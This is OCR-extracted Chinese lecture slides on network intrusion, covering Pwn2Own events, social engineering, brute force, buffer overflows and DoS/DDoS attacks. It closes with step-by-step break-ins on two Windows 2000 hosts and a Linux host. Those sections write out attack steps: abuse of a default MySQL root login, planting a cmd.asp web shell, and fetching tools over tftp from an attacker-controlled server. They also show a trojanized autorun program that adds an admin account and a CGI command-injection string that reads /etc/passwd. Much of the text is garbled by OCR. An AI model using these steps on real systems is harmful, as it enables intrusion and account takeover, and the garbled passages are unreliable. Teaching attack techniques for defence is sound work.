计算机安全-32网络入侵课件

3.2网络入侵

一条新闻

•2008年，全球黑客领域一项顶级赛事

CanSecWest安全大会在加拿大温哥华拉开了

帷幕。该赛事由CanSecWest安全会议进行组

织，主办方提供了三台运行不同操作系统的笔

记本电脑,分别是Linux、MacOSX和Vista,

供参赛黑客攻击。

•第一天，只允许黑客利用网络进行攻击，而没

有用户干预。因此，三台笔记本电脑均安然无

至

/So

一条新闻

•第二天，允许选手实施要求用户进

行某种操作的攻击行为，比如访问

嵌入恶意代码的网站或打开邮件等,

结果，MacOSX在30秒钟内即

被攻破。

-Miller利用的是苹果Safari浏览器漏

洞，只用了30秒钟就攻破了MacOS

文系统。

•第三天，由谢恩•麦考利(Shane

Macaulay)等入组成的力、组攻破

了Vista笔记本。

-黑客发现其中的AdobeFlash软件中

有个尚未被公布的漏洞。

•据悉，尽管少数参赛小组试图攻击

Linux素统，但均便获工功。尽管

有人发现了Linux漏洞，但却没有

按照大赛要求开发攻击代码。

2009黑客大赛曝Safari、IE8与

Firefox零日攻击

•美国时间3月18日，由TippingPoint发起的第三

届Pwn20wn黑客技术大赛拉开帷幕。

•在首日的比赛中，参赛者需要试图攻破主打有完

整补丁的主流浏览器(IE8,Firefox,Chrome,

Safari)以及拥有严格限制的智能手机

(Blackberry,Android,iPhone,

Nokia/Symbian,WindowsMobile)。

•作为为期三天的比赛奖励,ZeroDayInitiative

将为浏览器漏洞发现者提供5000美元并赠送所使

用计算机，而智能手机的漏洞发现这将得到

10000美元的奖励外加所攻破智能手机一年的使

用权。

2009黑客大赛曝Safari、IE8与

Firefox零日攻击

•在第一天的Pwn20wn比赛

中，智能手机的安全性经受

住了考验，而主流的浏览器

们却没那么幸运，两位获胜

者CharlieMiller和Nils分另Ll

攻破了Safari（两次）、IE8

以及Firefox。

•去年的得奖者之一Charlie

M川er在第一天的浏览器攻

击比赛中，仅用时2分钟便

再次攻破MacOSX的

Safari浏览器。

2009黑客大赛曝Safari、IE8与

Firefox零日攻击

•另一位参赛者Nils,则在Windows7品

台上成功突破了IE8的安全防护，这其

中包括微软最新采用的保护技术-

DEP（DataExecutionPrevention,

数据薪行保护）和ASLR（Address

SpaceLayoutRandomization,地址

空间布局随机化），这一举动让IE8的安

全性再次引起广任关注，最终Nils赢得

了最新的索尼Vaio笔记本和5000美元

的奖金。

•时隔不久，Nils再次让Pwn20wn的参

与者沸腾，他利用Safari中的一个绘图

工具的漏洞，快速拿下苹果Safari浏览

器，并在此获得5000美金的奖励和苹果

小白。在成功突破两款主流浏览器后，

Nils再接再励又将FireFox浏览器斩落马

下。

2010黑客大赛微软IE8、苹果Safari及火狐

(Firefox)等三大浏览器相继被攻破

•在PWN2OWN

2010黑客大赛上,

Independent

Security

Evaluators首席安

全分析师Charlie

Miller利用Safari的

漏洞率先拿下了一

nMacBookPro,

并获得了10000美

元奖金。

2010黑客大赛微软IE8、苹果Safari及

火狐(Firefox)等三大浏览器相继被攻破

•Dutch安全机构研究员

PeterVreugdenhiltk

成功利用IE8的多个漏

洞攻破了64位Winows

7操作系统，他因此获

得了1万美元的奖金和

一部Windows电脑。

2010黑客大赛微软IE8、苹果Safari及

火狐(Firefox)等三大浏览器相继被攻破

・来自InfoSecurity

的Nils成功在64位

Windows7上攻

破了Firefox3,

利用一个已知的内

存破坏漏洞他使用

calc.exe绕过了

DEP和ASLR,这

和Peter攻破IE8

如出一辙。

内容提要

•介绍目前常用的网络攻击手段：

-社会工程学攻击

-物理攻击

-暴力攻击

-利用Unicode漏洞攻击

-利用缓冲区溢出漏洞进行攻击等技术。

•并结合实际，介绍流行的攻击工具的使用

以及部分工具的代码实现。

社会工程学攻击

•社交工程是使用计谋和假情报去获得密码和其他敏感信息

的科学，研究一个站点的策略其中之一就是尽可能多的了

解这个组织的个体，因此黑客不断试图寻找更加精妙的方

法从他们希望渗透的组织那里获得信息。

•举个例子：一组高中学生曾经想要进入一个当地的公司的

计算机网络，他们拟定了一个表格，调查看上去显得是无

害的个人信息，例如所有秘书和行政人员和他们的配偶、

孩子的名字，这些从学生转变成的黑客说这种简单的调查

是他们社会研究工作的一部分。利用这份表格这些学生能

够快速的进入系统，因为网络上的大多数人是使用宠物和

他们配偶名字作为密码。

社会工程学攻击

•目前社会工程学攻击包括多种方式：

•1、打电话请求密码

-尽管不像前面讨论的策略那样聪明，打电话寻问密码也经常奏

效。在社会工程中那些黑客冒充失去密码的合法雇员，经常通

过这种简单的方法重新获得密码。

•2、伪造Email

-使用telnet一个黑客可以截取任何一个身份证发送Email的全

部信息，这样的Email消息是真的，因为它发自于一个合法的

用户。在这种情形下这些信息显得是绝对的真实。黑客可以伪

造这些。一个冒充系统管理员或经理的黑客就能较为轻松的获

得大量的信息，黑客就能实施他们的恶意阴谋。

•3、网络钓鱼

-假冒网站，诱使用户输入秘密信息。

物理攻击与防范

•物理安全是保护一些比较重要的设备不被

接触。

•物理安全比较难防，因为攻击往往来自能

够接触到物理设备的用户。

暴力攻击

•暴力攻击的一个具体例子是，一个黑客试图使用

计算机和信息去破解一个密码。

•一个黑客需要破解一段单一的被用非对称密钥加

密的信息，为了破解这种算法，一个黑客需要求

助于非常精密复杂的方法，它使用120个工作站,

两个超级计算机利用从三个主要的研究中心获得

的信息，即使拥有这种配备，它也将花掉八天的

时间去破解加密算法，实际上破解加密过程八天

已是非常短暂的时间了。

字典文件

一次字典攻击能否成功，很大因素上决定与字典文件。一个好的字典文件

可以高效快速的得到系统的密码。攻击不同的公司、不通地域的计算机，

可以根据公司管理员的姓氏以及家人的生日，可以作为字典文件的一部分,

公司以及部门的简称一般也可以作为字典文件的一部分，这样可以大大的

提高破解效率。

一个字典文件本身就是一个标准的文本文件，其中的每一行就代表一个可

能的密码。目前有很多工具软件专门来创建字典文件

暴力破解操作系统密码

•字典文件为暴力破解提供了一条捷径，程序首先通过扫描得

到系统的用户，然后利用字典中每一个密码来登录系统，看

是否成功，如果成功则将密码显示

•案例暴力破解操作系统密码

•比如使用字典文件，利用工具软件GetNTUser依然可以将管

理员密码破解出来

暴力破解邮箱密码

•邮箱的密码一般需要设置到

八位以上，否则七位以下的

密码容易被破解。

•尤其七位全部是数字，更容

易被破解。

•案例电子邮箱暴力破解

•破解电子邮箱密码，一个比较

著名的工具软件是：黑雨——

POP3邮箱密码暴力破解器，

比较稳定的版本是2.3.1,

暴力破解软件密码

•目前许多软件都具有加密的功能，比如Office文档、

Winzip文档和Winrar文档等等。这些文档密码可以有效

的防止文档被他人使用和阅读。但是如果密码位数不够长

的话，同样容易被破解。

•案例Office文档暴力破解

缓冲区溢出攻击

•目前最流行的一种攻击技术就是缓冲区溢出攻击。

当目标操作系统收到了超过了它的最大能接收的

信息量的时候，将发生缓冲区溢出。这些多余的

数据将使程序的缓冲区溢出，然后覆盖了实际的

程序数据，缓冲区溢出使目标系统的程序被修改,

经过这种修改的结果使在系统上产生一个后门。

•这项攻击对技术要求比较高，但是攻击的过程却

非常简单。缓冲区溢出原理很简单，比如程序：

缓冲区溢出攻击

•voidfunction(char*szParal)

•{

•charbuff[16];

•strcpy(buffer,szParal);

•}

•程序中利用strcpy函数将szParal中的内容拷贝

到buff中，只要szParal的长度大于16,就会造

成缓冲区溢出。存在strcpy函数这样问题的C语

言函数还有:strcat()>gets。、scanf()等。

RPC漏洞溢出

•远程过程调用RPC(RemoteProcedureCall),是操作

系统的一种消息传递功能，允许应用程序呼叫网络上的计

算机。当系统启动的时候，自动加载RPC服务。可以在服

务列表中看到系统的RPC服务

啧最务,1□1x

操作®查看出11QfI露面I声画展I像:[I,・II・>

树I名称,I询

^NetworkDDEDSDM管理网络DDE的共享动…LocalSystem

爆NTLMSecuritySupportProvider为使用传输协议而不是…已启动LocalSystem

%NUTCRACKERserviceSupportsNUTCRACKERa...已启动LocalSystem

^PerformanceLogsandAlerts配置性能日志和警报.LocalSystem

^PGPsdkServiceManagespublickeyoper...已启动LocalSystem

嚼PlugandPlay管理设备安装以及配置...已启动LocalSystem

卷PrintSpooler将文件加载到内存中以…已月动LocalSystem

嚼ProtectedStorage提供对敏感数据(如私…已启动LocalSystem

%QoSRSVP

为侬赖质量服务(Qo5)...LocalSystem

骸RemoteAccessAutoConnectionManager无论什么时候当某个程…LocalSystem

嚼RemoteAccessConnectionManager创建网络连接-已启动LocalSystem

^RemoteProcedureCall(RPC)提供终结点映射程序(e...已启动自动LocalSystem；

手动

^RemoteProcedureCall(RPC)Locator管理RPC名称服务数据LocalSystem

自动

已

后动

^RemoteRegistryService允许远程注册表操作.LocalSystem一

已后

自动

动

嚼RemovableStorage管理可移动媒体、驱动…LocalSystem

巳禁

用

^RoutingandRemoteAccess在局域网以及广域网环…动LocalSystem

自动

已后

蜂RunAsService在不同凭据下启用启动…动LocalSystem

自动

已后

物SecurityAccountsManager存储本地用尸帐户的安…动LocalSystem

自动

已后

啕Server提供RPC支持、文件、…动LocalSystem

自动

己后

爆ServiceSupport

动LocalSystem

WindowsServiceSupport自动

已启

遍SimpleMailTransportProtocol(SMTP)跨网传送电子邮件LocalSystem二J

电子邮件欺骗：使用类似的地址

•发信人使用被假冒者的名字注册一个账号，然

后给目标发送一封正常的信

邮件欺骗的保护

•邮件服务器的验证

-Smtp服务器验证发送者的身份，以及发送的邮

件地址是否与邮件服务器属于相同的域

-验证接收方的域名与邮件服务器的域名是否相同

-有的也验证发送者的域名是否有效，通过反向

DNS解析

-攻击者可以运行自己的smtp邮件服务器

•不能防止一个内部用户假冒另一个内部用户发

送邮件

•审核制度，所有的邮件都有记录

-隐私？

Web欺骗

•Web是应用层上提供的服务，直接面向Internet用户,

欺骗的根源在于

-由于Internet的开放性，任何人都可以建立自己的Web站

点

-Web站点名字（DNS域名）可以自由注册，按先后顺序

-并不是每个用户都清楚Web的运行规则

•Web欺骗的动机

-商业利益，商业竞争

-政治目的

•Web欺骗的形式

-使用相似的域名

-改写URL

-劫持Web会话

使用类似的域名

•注册一个与目标公司或组织相似的域名，然后

建立一个欺骗网站，骗取该公司的用户的信任,

以便得到这些用户的信息

-例如，针对ABC公司，用来混淆

-如果客户提供了敏感信息，那么这种欺骗可能会

造成进一步的危害，例如：

•用户在假冒的网站上订购了一些商品，然后出示支

付信息，假冒的网站把这些信息记录下来（并分配一

个cookie）,然后提示：现在网站出现故信，请重试

一次。当用户重试的时候，假冒网站发现这个用户

带有cookie,就把它的请求转到真正的网站上。用

这种方法，假冒网站可以收集到用户的敏感信息。

-对于从事商业活动的用户，应对这种欺骗提高警

惕

改写URL

•一个HTTP页面从Web服务器到浏览器的传输过程中,

如果其中的内容被修改了的话，则欺骗就会发生，其

中最重要的是URL改写

-URL改写可以把用户带到不该去的地方，例如：

<ahref=www.hackersite>WelcomtoHollywood-

Moviesite.</a>

•有一些更为隐蔽的做法

-直接指向一些恶意的代码

-把url定向放到script代码中，难以发现

•改写页面的做法

-入侵Web服务器，修改页面

-设置中间http代理

-在传输路径上截获页面并改写

-在客户端装载后门程序

关于欺骗技术

•从这些欺骗技术，我们可以看到

-IP协议的脆弱性

-应用层上也缺乏有效的安全措施

-在网络攻击技术中，欺骗术是比较初级的，技术

含量并示高，它是针对Internet中考种不完善的

机制而发展起来的

•非技术性的欺骗

-比如，实施社会工程

-毕竟网络世界与现实世界是紧密相关的

•避免被欺骗最好的办法是教育、教育、再教育

-增强每一个Internet用户的安全意识，网络管理

人员以及软件开发人员的安全意识更加重要

3・3拒绝服务攻击

Denial—of—Service

DoS/DDoS攻击事件介绍

•世界上第一个DoS攻击：1988年11月发生的

Morris蠕虫事件。导致了5000多台主机瘫痪。

1999年秋天，CMU大学的CERT中心发布出现

一种新的攻击：DDoSo

2000年，世界上著名的电子商务网站：Yahoo>

eBay、Amazon、CNN等都遭到了分布式拒绝

服务攻击。

拒绝服务攻击

拒绝服务攻击(DoS):就是利用网络协议本身的

漏洞以及操作系统或应用程序软件实现的漏洞对

计算机发动攻击，使计算机无法正常对外提供服

务。除了利用各种漏洞进行攻击，拒绝服务攻击

也可以利用合法的服务请求来占用过多的服务资

源，使服务过载，从而无法响应其他用户的合法

请求。这些服务资源包括网络带宽、系统文件空

间、CPU处理能力、内存空间、连接的进程数。

目的：使目标主机无法提供正常的服务或是使目

标主机崩溃。而其他类型攻击的目的都是为了获

取其控制权。

DoS攻击种类

•攻击种类

-停止服务：破坏或是迫使目标服务器关闭一个特定服

务。

-消耗资源：服务进程本身还能够运行，但攻击者消耗

了计算机和网络资源，阻止了合法用户的正常访问。

•攻击方法

-利用网络传输协议的缺陷，发送畸形的数据包，导致

目标主机的TCP/IP协议栈无法处理而拒绝服务。

-利用主机上的服务程序的漏洞，发送特殊格式的数据

导致服务处理错误而拒绝服务。

-产生高流量的无用数据，造成网络拥塞，使受害主机

无法与外界正常通信。

-利用应用服务协议向缺陷，提交大量的请求将主机资

源耗尽

DoS攻击分类

停止服务消耗资源

■杀死进程（init,inet进程）■填充进程表

■重新配置系统■填充整个文件系统

■使进程崩溃■填充整个网络

本地

■恶思数据包攻击（Land,■数据包泛滥(SYNFlood,

Teardrop等）Smurf,DDoS等)

远程

恶意数据包型DoS攻击

恶意数据包型DoS攻击利用某些操作系统的

TCP/IP协议栈或是其他一些网络应用服务的软

件实现中存在漏洞，构造一些非法、恶意的数

据包，由于开发时没有预计到会出现这些非法

数据包，系统相应的响应也是随机的。因此，

这类攻击会递归执行，导致许多系统崩溃、停

止响应等。

•Land攻击TearDrop-泪滴攻击

死亡之ping攻击畸形消息攻击

Land攻击

•Land攻击原理是利用某些TCP/IP协议栈的三

次握手过程实现中存在缺陷，而进行DoS攻击

的O

Laid攻击是向目标主机发送一个特殊的SYN包,

包中的源地址和目的地址都是目标主机的地址。

目标主机收到这样的连接请求时会向自己发送

SYN/ACK数据包，结果导致目标主机向自己

发回ACK数据包并创建一个连接，大量的这样

数据包使目标主机建立了很多无效的连接，系

统资源被耗尽。

死亡之ping(PingofDeath)

Ping程序使用的ICMP协议，而ICMP报文长度是

固定的，64KO

早期的很多操作系统在接收ICMP数据报文时，

只开辟64K的缓冲区用于存放接收到的ICMP报文,

并且没有检查接收到ICMP报文的实际长度，如

果ICMP才艮文的实际长度大于64K,则产生一个缓

冲区溢出错误，导致TCP/IP协议堆栈崩溃。造成

主机的重启动或死机。这就是PingofDeath的原

理。

PingofDeath攻击实例

•Ping-I655402

参数“I”：指定发送ICMP报文的长度。

Windows98/2K中，使用下面的命令

Ping-1655402

系统返回的信息：

Badvaluefbroption-hvalidrangeis

from1to255

泪滴(teardrop)攻击简介

•泪滴(teardrop)攻击又称为分片攻击。

•它是一种典型的利用TCP/IP协议栈的漏洞进行

DoS攻击。由于第一个实现这种攻击的程序叫

teardrop,所以这种攻击也被称为“泪滴”攻

击。

•Teardrop攻击主要是利用IP数据包的分片机制,

通过发送重叠的分片偏移地址，使的TCP/IP协

议栈无法正确的对IP分片重组，最终导致目标主

机的TCP/IP协议栈的崩溃。

Teardrop攻击示意图

畸形消息攻击

•畸形消息攻击是一种有针对性的拒绝服务攻击

方式，它利用操作系统或是应用程序存在某些

处理消息时没有适当的错误校验的漏洞进行攻

击。所以一旦收到这些畸形的消息，目标系统

或程序就会崩溃。

向nS5服务器递交如下的URL会导致IIS5的停

止服务：

http://dstIP/[25kbof'.5]ida

GET/[3k]htrHTTP/1.0

远程拒绝服务式攻击的恶意数据包-1

攻击名工作方式攻击平台

发送一个假的数据包，它的源IP地址和Windows系

Land源端口号与目标主机IP地址和目的端口统，Unix系

(1997)号相同，旧的TCP/IP协议栈在这种情统，路由器，

况下就会崩溃。打印机

Latierra与Land攻击类似，但同时向目标主机同上

的多个端口发送多种类型的Land数据

包

Pingof发送一个超长（大于65535个字节）的Windows系

DeathPing数据包，旧的TCP/IP协议栈无法统，Unix系

(1996)处理而崩溃。统。

Jolt2发送一些数据包碎片，长度为零。这些win9X,NT,

(2000)数据包碎片就像一串数据包的第一个。2K

目标主机会消耗处理器全部能力来重新

组装这些数据包碎片

远程拒绝服务式攻击的恶意数据包一2

攻击名工作方式攻击平台

Teardrop发送重叠的数据包碎片，即在数据包win9X,NT

Newtear头内碎片的长度被设置成不正确的值，Linux

Bonk这些数据包碎片重组时无法正确排队，

Syndrop目标主机就会崩溃。

Winnuke向个windows主机开放文件共学系win9X,NT

统端口(TCP端口139)发送格式错

误数据。目标主机使用服务器信息块

(SMB)协议无法对其进行格式化，

导致系统瘫痪。系统显示“可怕的蓝

屏”

远程资源消耗型DoS攻击

0目前最流行的DoS攻击技术就是远程占用

目标主机的资源，特别是网络带宽。

•SYNFLOOD攻击Fraggle攻击

UDPFLOOD攻击电子邮件炸弹攻击

Smurf攻击

SYNFLOOD攻击原理

•进行synflood攻击的程序向服务器发送一个

带有虚假源地址（未被使用的）的SYN包，当

服务器收到这个数据包时，向这个虚假地址发

送一个SYN/ACK的响应数据包，由于源地址

是不存在的地址，因此，目标主机发送的

SYN/ACK包不会得到确认，目标主机一直等

待这个连接直至超时，当这种带有虚假地址的

连接请求数目超过了系统规定的最大连接请求

数目时，目标主机就无法为其他正常用户提供

服务。

UDPFlood攻击

•echo服务和chargen服务

Echo和chargen服务都是自动回复的网络

服务。当用户向echo服务的端口发送一个字

符，则echo服务也返回一个相同的字符。而

chargen服务返回一个随机的字符。

黑客找到两台启动echo或chargen服务的主机，

然后伪装成其中一台主机向另一台主机echo或

chargen服务发送一个字符，这样这两台主机就

互相回复薮据，两台主机间形成大量的UDP数

据包，当多个系统之间互相服务对方的、、

echo/chargen服务时，就导致整个网络的瘫痪。

Smurf攻击原理

•Smurf攻击属于放大攻击。放大攻击的原

理就是发送一个数据包产生多个响应。比如:

黑客向一个LAN的广播地址发送一个ping数

据包，如果这个LAN的路由器配置允许广播

数据包，那么这个LAN与广域网相连接的路

由器首先收到这个ping数据包，路由器将这

个广播消息发送给LAN的每一台主机，然后

每台主机都发送一个ping响应数据包。

Smur改击的条件

•smurf攻击中包括三方：攻击者，中间网络（也

属于受害对象）、受害主机。smurf攻击中攻击

者发送一个源地址为受害主机的ICMP回显请求给

中间网络。smurf攻击的关键是找到允许广播数

据包的中间网络。

Smur做击示意图

中间网络

Fraggle攻击

•Fraggle攻击原理与smurf攻击一样，都

是向广播地址发送数据包，利用广播地

址的特殊性将攻击放大，导致对目标主

机的DoS攻击。只是Fraggle使用的是

UDP应答消息。

电子邮件炸弹

•电子邮件炸弹是最古老的匿名攻击之一，

它的原理就是利用旧的SMTP协议不要求

对发信人进行身份认证，黑客以受害者

的email地址订阅大量的邮件列表，从而

导致受害者的邮箱空间被占满。

新的SMTP协议增加了2个命令，对发信

人进行身份认证，在一定程度上降低了

电子邮件炸弹的风险。

分布式拒绝服务攻击

DDoS

DDoS攻击原理

•大量主机同时对同一个目标或多个目标发动拒

绝服务攻击，这种协同攻击方式被称为分布式

拒绝服务攻击。

为了发动DDoS,黑客必须先控制大量的主机

（这些主机被称为zombie）,在这些主抗上

安装进行DoS攻击的软件。

DDoS攻击软件一般分为守护程序和服务器程

序。黑客在客户端通过客户端软件向服务器软

件发出攻击命令，服务器端软件在接到命令后,

控制守护进程向目标主机发动DDoS攻击。一

旦客户端发出攻击命令后，就与服务器断开，

由服务器指挥守护进程进行攻击。

分布式拒绝服务攻击示意图

客户端Client

守护进程

(agent)

目标主机

(被攻击对象)

DDoS攻击过程

第一步：探测扫描大量主机以寻找可入侵主

机目标。

第二步：入侵有安全漏洞的主机并获取控制权

第三步：在每台入侵主机中安装攻击程序，一些

主机上安装handler,另一■些主机上安装

agento

第四步：黑客向handler发送攻击指令，handler

控制agent发动DDoS攻击。

常见的DDoS攻击工具

•TFN/TFN2K

Trinoo

Stacheldraht

Trinity

MStream

TFN2K

•TFN(TribeFloodNetwork)是德国著

名黑客Mixter编写的DDoS工具，由服

务器端程序和守护进程组成，能实施

ICMPFLOOD,SYNFLOOD,UDP

FLOOD,Smurf等多种拒绝服务攻击。

TFN2K是目前网上最流行的DDoS工具，

它支持Unix/Linux以及WinNT/Win2K

等多种操作系统。

TFN2K特点

•服务器端控制守护进程发动DDoS攻击时，可以定

制通信协议。包括：如果采用

TCP,UDP,ICMPO

ICMP协议，发送的数据包是ICMP_ECHOREPLY

类型数据包。如果采用TCP,UDP贝激据包的首部

信息都是随机生成的。

防御DoS攻击

•基于最小权限的原则建立和维护用户帐号

下载、安装最新的服务器补丁程序。

安装入侵检测系统或是其他系统监控软件。

提供高配置的服务器硬件，比如：CPU,内存,

网络带宽。

几个攻击实例讲解

•三个具体的攻击实例

-两个Windows2000

-一个Linux

•研究攻击者的行为

-更加有效地采取安全保护措施

•在实例中，省略了扫描步骤

-直接给出扫描后的结果

攻击windows系统的第一个例子

（一）

•对目标机器进行扫描

-得到扫描结果，获取目标机器信息

-OS：windows2000server

-系统开启端口

•25/tcpopensmtp

•53/tcpopendomain

•80/tcpopenhttp

•110/tcpopenpop3

・1002/tcpopenunknown

・3306/tcpopenmysql

-可能使用防火墙或者TCP/IP过滤

攻击windows系统的第一个例子

(-)

•进一步进行探测

-虽然80端口打开，但是没有发现HS的漏洞

-对于25和110端口，也没有发现漏洞

-可用的端口：3306

-3306：MySQL缺省端口

•对3306端口进行探测

-MySQL开启的缺省端口

-MySQL的缺省帐号是root,密码为空

-在客户端连接

・F:\cmd)mysql-uroot-h

-成功

•WelcometotheMySQLmonitor.Commandsendwith;or\g.Your

MySQLconnectionidis3038toserverversion:3.23.21-beta.Type

'help;'or'\h'forhelp.Type'\c'toclearthebuffer.

Mysql>

攻击windows系统的第一个例子

（三）

•我们得到一个漏洞

-不是系统漏洞，而是管理员的疏忽

•系统管理员使用缺省用户和帐号

•漏洞可以提供给我们的操作权限

-如果是SQLServer,可以使用xp_shellcmd

-直接执行cmd命令

-现在的权限：

•查找数据库

•读取服务器上的文件（知道物理路径）

•往服务器上写文件，保证文件不是覆盖的

•我们的做法

-在网页上加一个asp,通过ie来执行命令

攻击windows系统的第一个例子

(四)

•首先需要猜测web的物理路径

-Web一般存放位置

•C:\InetPub\wwwroot\；C:\wwwroot\；D:\web...

-对猜测进行判断

•新建一个表

-mysql)usetest;createtabletmp(strTEXT);

-Databasechanged

-QueryOK,0rowsaffected(0.05sec)

•将文件load到表中，观察它的结果

-mysql)loaddatainfile"d:\\www\\about\\about.htm"into

tabletmp;

-QueryOK,235rowsaffected(0.05sec)

-Records:235Deleted:0Skipped:0Warnings:0

攻击windows系统的第一个例子

（五）

•我们得到HS的路径一D:\www\

-我们测试的文件是

/about/about.htm

•将一个asp文件添加到服务器上，以便可以运行

shell

-建立的asp文件可以在服务器端执行shell命令，并把

结果发送到客户端

-在数据库中重新建立一个表

-将写好的cmd.asp文件导入到表中

-cmd.asp文件的鬲容：通过IE来执行系统命令

-将cmd.asp导入到web文件夹下，以便用户可以访问

攻击windows系统的第一个例子

（六）

•使用得到的Shell收集系统信息

•文件系统权限、系统用户信息、当前启动服务等

•网络信息

-TCPx.x.x.x:21x.x.x.x:0LISTENING

TCPx.x.x.x:119x.x.x.x:0LISTENING

TCP:3389:0LISTENING

-可见本机采用了TCP/IP过滤，终端服务只对内网开放

-本机是网关，攻击成功后可以侵入内部网，获得更多

曲信息

•如何取得系统的admin权限？

一没有135、138、139和445端口，即使添加了

administrator权限帐号也不是很有用

攻击windows系统的第一个例子

（七）

•查看一下系统的安全程度

•根据系统安全程度进行下一步行动

-查看系统打补丁的情况

-注册表HKLM\Software\Microsoft\Windows

NT\CurrentVersion\hotfix彳呆存了补丁的情况

-上传文件来查看注册表

•在目标机器上上传一个文件reg.exe

-该文件可以查看注册表

-执行命令使目标主机从ftp上下载我们需要的程序

-失败。原因？

-应该采用的方法？

攻击windows系统的第一个例子

（A）

•使用TFTP协议上传文件

-tftp-ImyserverGETreg.exe

-Myserver：我的机器或者我控制的机器，开启tftp服务

•查看注册表

-Listingof[Software\Microsoft\WindowsNT\CurrentVersion\hotfix]

•[Q147222]

•[Q269862]（IISUnicode解码目录遍历漏洞）

•[Q277873]（MicrosoftllSCGI文件名检查漏洞）

-只有两个补丁

-看来系统管理员是只注意了web服务器的安全

•发现漏洞！

攻击windows系统的第一个例子

（九）

•使用目标机器提供的终端服务

-目标机器的TCP/IP过滤

-对内部网的网卡没有限制，但是对于外部网网卡进行

了过滤

-查看过滤信息

•regQUERY注册表检查

•得到结果：内网网卡没有任何限制

•可以考虑使用终端服务

•解决方法

-socket转发和反弹端口技术

攻击windows系统的第一个例子

(+)

•socket转发和反弹端口技术简要介绍

•反弹端口

-防火墙对于本机发出的连接疏于防范

-攻击者打开80端口，由被攻击机器主动连接

•Socket转发

-T各内网网卡上的数据通过socket转发出去

•目标机器

-运行AgentSlave

一连接至(Jmyserver80端口

-连接到内网IP192.168.L33389端口

•另一f飒务器myserver

-运行AgentMaster

-监听端口3389

-监听端口80

攻击windows系统的第一个例子

(11)

•连接到myserve「的3389端口

•通过输入法漏洞登录系统，取得admin权限

•启示

-永远不要相信缺省配置

•通过mysql的缺省账号开始整个攻击过程

•缺省的服务，不需要的应该关掉

-密码的安全

•没有好的密码，系统安全无从谈起

•遗憾的是，网络上弱密码过多

-空密码、与账号相同的密码、简单密码(123,123456...)

-账号权限：administrator

攻击windows系统的第二个例子

（一）

•扫描系统后得到的结果

-系统开启135、138、445端口

-可以远程读取注册表

-其他服务没有漏洞可以利用

•有很多用户名和密码相同

-没有administrator权限的用户可用

-无法使用at等命令

•通过NETBIOS上的SMB协议登录上去查看

-Windows系统目录放在D盘上

-C盘有一些常用软件

-其他盘有一些个人文件

攻击windows系统的第二个例子

（二）

•攻击看起来很困难

-虽然有许多帐号，但是无法取得最高权限

-注册表是只读的，无法添加一个一个程序自动运行

-无法使目标机器自动运行一个木马程序

•再次检查注册表

-检查开机自动运行程序选项

-有C盘下的程序

-发现问题：虽然注册表无法修改，但是C盘我们有权限

读写

-攻击方法：修改开机运行的程序内容，使其成为我们

的木马

攻击windows系统的第二个例子

（三）

•具体攻击

-记录下开机自动运行的程序A位置

-下载上述程序A

I-编写一个程序B,新建一个帐号，并把它添加到

administrator组中

-将我们编写的黑客程序和下载的程序合并成同一个文

件，并把它改名成A

-将新得到的A上传到目标机器上

-利用SMB溢出漏洞重启目标机器

-得到具有administrator权限的帐号

攻击windows系统的第二个例子

（四）

•启示

-管理员是安全体系中最重要的一环

-本例中管理员的失误

•没有教育用户使用比较安全的密码

•没有关闭注册表远程访问服务

-即使是只读，也会产生灾难性损失

•没有合理设置某些重要文件的读写权限

-把系统文件放在D盘上，但是某些开机运行的文件放在C

盘上

-C盘可供用户随便读写

-对于黑客来说，黑无定法

-找到系统的可利用缺陷

-人与人的战斗

攻击Linux系统的实例(一)

•对某台Linux系统进行扫描，扫描后发现端口

-443端口：可能是H7TPS服务

-25端口：可能是SMTP服务

•远程攻击手段很有限

-首先查看监听25端口的程序

-telnet25

-Trying172.18.29,200...

-Connectedto

-Escapecharacteris

-220ESTMPSendmail8.11.0/8.11.0;

-vrftroot

-252CannotVFRYuser;tryRCPTtoattemptdelivery(ortryfinger)

-expn

-502Sorry,wedonotallowthisoperation

-MAIL

-503PolitepeoplesayHELOfirst

攻击Linux系统的实例（二）

•得到的结论

-sendmail版本很新，没有已知漏洞

-设置严格，拒绝执行VRFY和EXPN命令

-尝试针对sendmail漏洞攻击，未果

•对SMTP无效，转向攻击Web服务器

-确定是否运行的是HTTPS

-使用stunnel,方法于手工telnet到80端口并发送http

命令

-stunnel-D7-f-c-r

-经过检查，在Apache服务器和其SSL组件以及编译时

链接的加密库（OpenSSL）都不存在已知的漏洞

•我们该如何做？

攻击Linux系统的实例（三）

•唯一的方法，检查Web漏洞

-网页上的CGI脚本程序

-在目标机器上搜寻cgi程序

-找到一个cgi程序:query_email.cgi：对email地址查询的服务

-更新日期表明该程序已经彳R久没有更新了，可能会存在漏洞

-试图查询

•输入Bob,得到结果

・空白，"Nosuchemployees”页面

•输入％3b（“；”的十六进制表示），HTML页面中给出这样的

输出

•Usage：grep[option]...PATTERN[FILE]...Try'grep-

help*formoreinformation,sh:/web/private/people:

Permissiondenied

攻击Linux系统的实例（四）

•我们得到的结论

-CGI调用里ep命令

-可能在查询血运行grep$name/web/private/people

•我们再次运行CGL并把名字变量设置为：

-%2E%20%2Fetc%2Fpasswd%3B%2Fusr%2Fbin%2Fid

%3